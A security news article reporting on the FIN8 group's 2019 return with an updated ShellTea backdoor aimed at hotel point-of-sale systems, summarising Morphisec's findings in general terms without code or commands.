Show vulnerabilities with patch / with exploit
13 June 2019

FIN8 hacking group reappears with updated ShellTea backdoor, targets POS devices in the hotel industry


FIN8 hacking group reappears with updated ShellTea backdoor, targets POS devices in the hotel industry

After being mostly silent for two years FIN8 hacking group has returned with a new campaign aimed at companies in the hospitality sector. As opposed to APT (advanced persistent threat) groups that are focused on intelligence gathering and cyber-espionage, FIN8 conducts attacks for its own financial profit. And while some financially motivated hackers often target banks and other companies in the financial sector, this group is primarily focused on attacking point-of-sale (PoS) systems in effort to steal payment card data, which they put up for sale on online hacking forums.

In 2016 - 2017 FireEye and root9B published reports detailing string of FIN8 attacks aimed at PoS systems in the retail sector. Since then the group went on hiatus for nearly two years, but in March 2019 cyber-security firm Morphisec spotted a new wave of attacks targeting companies in the hospitality industry. According to the report, the firm was able to stop the attacks before any data was stolen.

As with previous campaigns the group started its attack with the spear-fishing emails in order to install the ShellTea (PunchBuggy) malware backdoor into a victim's network designed to steal data from POS devices. While FIN8 used the same ShellTea backdoor as in previous campaigns, this time hackers made some changes to the malware to help it avoid detection and other security protocols.

According to the researchers, FIN8 made several improvements to its malware arsenal, fixing bugs and making the malicious tools harder to detect. For instance, in new ShellTea version the hashing algorithm used for hashing most of the functions in order to evade standard analysis tools has been slightly modified. Additionally, the PowerShell script used in part of the attack can now collect a significant amount of data from the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, anti-virus registered in the system, privileges, domain and workgroup information. The results are Gzipped and saved under random file in the temp folder and then the data is send back to the C2 and the file is deleted.

The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups, note the experts. The focus on the hotel industry could be explained by the fact that many POS networks are running on the POS version of Window 7, making them more susceptible to vulnerabilities. Additionally, many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.

Back to the list

Latest Posts

Updated ComRAT malware uses Gmail web UI to receive commands and exfiltrate data

Updated ComRAT malware uses Gmail web UI to receive commands and exfiltrate data

The ComRAT v4 malware includes two new features, such as the ability to exfiltrate antivirus logs and the ability to control the malware using a Gmail inbox.
26 May 2020
25 million Mathway user records leak online

25 million Mathway user records leak online

Since the start of this month, ShinyHunters has been offering access to databases containing millions user records obtained from hacks of various companies.
26 May 2020
Hackers put up for sale SQL databases stolen from online shops

Hackers put up for sale SQL databases stolen from online shops

More than half of hacked databases are from online shops in Germany, others are from Brazil, the U.S., Italy, India, Spain, and Belarus.
26 May 2020
Featured vulnerabilities
Stored cross-site scripting in Composr CMS
Low Not Patched | 26 May, 2020
Denial of service in GoldWave
Medium Not Patched | 26 May, 2020
OS Command Injection in Online Discussion Forum Site
Medium Not Patched | 26 May, 2020